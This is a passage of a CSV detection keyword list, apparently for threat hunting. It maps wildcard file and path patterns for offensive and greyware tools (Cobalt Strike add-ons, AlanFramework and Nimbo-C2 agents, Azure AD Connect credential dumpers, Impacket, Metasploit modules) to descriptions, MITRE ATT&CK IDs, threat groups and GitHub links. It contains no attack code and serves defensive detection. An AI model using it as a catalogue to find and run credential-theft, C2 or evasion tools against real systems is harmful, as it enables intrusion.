Gathering","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","8","772","105","2023-06-20T07:49:31Z","2019-04-24T17:18:46Z" +"*ad-ldap-enum.py*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" +"*ad-ldap-enum-main*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" +"*adm|admin|root|sudo|wheel*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*admin.kirbi*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Admin2Sys.exe*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" +"*Admin2Sys-main*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" +"*Adminisme/ServerScan/*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" +"*adobe_top100_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ADRecon -OutputDir *","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","AD Enumeration","https://github.com/adrecon/ADRecon","1","0","greyware tool - risks of False positive !","N/A","5","488","83","2023-08-08T21:44:01Z","2018-12-15T13:00:09Z" +"*ADRecon.ps1*","greyware_tool_keyword","adrecon","ADRecon is a tool which gathers information about the Active Directory and generates a report which can provide a holistic picture of the current state of the target AD environment.","T1018 - T1087.001 - T1069.001 - T1003.002 - T1482","TA0007 - TA0009 - TA0040","N/A","N/A","AD Enumeration","https://github.com/adrecon/ADRecon","1","1","greyware tool - risks of False positive !","N/A","5","488","83","2023-08-08T21:44:01Z","2018-12-15T13:00:09Z" +"*adsearch* --domain-admins*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*adsearch.exe*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*ADSearch.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*ADSearch.sln*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*ADSearch\ADSearch.cs*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","0","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*adsearch-master.zip","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*ADSyncDecrypt.exe*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*ADSyncGather.exe*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*ADSyncQuery*ADSync.mdf*.txt*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*Advanced IP Scanner*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*advanced_ip_scanner*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Advanced_IP_Scanner*.exe*","greyware_tool_keyword","advanced-ip-scanner","The program shows all network devices. gives you access to shared folders. provides remote control of computers (via RDP and Radmin) and can even remotely switch computers off. It is easy to use and runs as a portable edition (abused by TA)","T1595 - T1046","TA0007 - TA0011","N/A","Conti2 - Darkside/UNC24653 - Egregor4 - Hades/ Evilcorp5 - REvil6 - Ryuk/ UNC18787 - UNC24477 - UNC Iranian actor8 - Dharma9","Reconnaissance","https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Advanced_Port_Scanner_*.exe*","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://www.advanced-port-scanner.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*Advanced-SQL-Injection-Cheatsheet*","offensive_tool_keyword","Advanced-SQL-Injection-Cheatsheet","A cheat sheet that contains advanced queries for SQL Injection of all types.","T1548 T1562 T1027","N/A","N/A","N/A","Exploitation tools","https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet","1","1","N/A","N/A","10","2242","569","2023-05-13T17:15:20Z","2020-10-23T18:14:47Z" +"*advantech_iview_networkservlet_cmd_inject.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*adxcsouf2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ADZero.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1072","TA0001 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Privia-Security/ADZero","1","1","N/A","N/A","1","20","6","2020-10-02T13:00:21Z","2020-09-29T20:43:06Z" +"*aem2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*AES_cryptor.py *","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*AesEncryptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","0","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" +"*ag_load_script*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*agent*DNSCommunication.cpp*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" +"*agent/cmd_download_files.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent/cmd_exec.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent/cmd_kill.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent/cmd_proxy.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent/cmd_run.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent/cmd_shell.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent/cmd_sleep.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent/cmd_sysinfo.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent/cmd_upload_files.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent/dll.nim*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*agent/elf.nim*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*agent/exe.nim*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*Agent/ratchatPT.go*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*agent\cmd_download_files.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent\cmd_exec.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent\cmd_kill.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent\cmd_proxy.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent\cmd_run.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent\cmd_shell.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent\cmd_sleep.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent\cmd_sysinfo.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent\cmd_upload_files.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agent_code/bash_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" +"*agent_dll.dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" +"*agents/Follina-2*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*AggressiveProxy.cna*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" +"*aggressor.beacons*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*aggressor.bshell*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 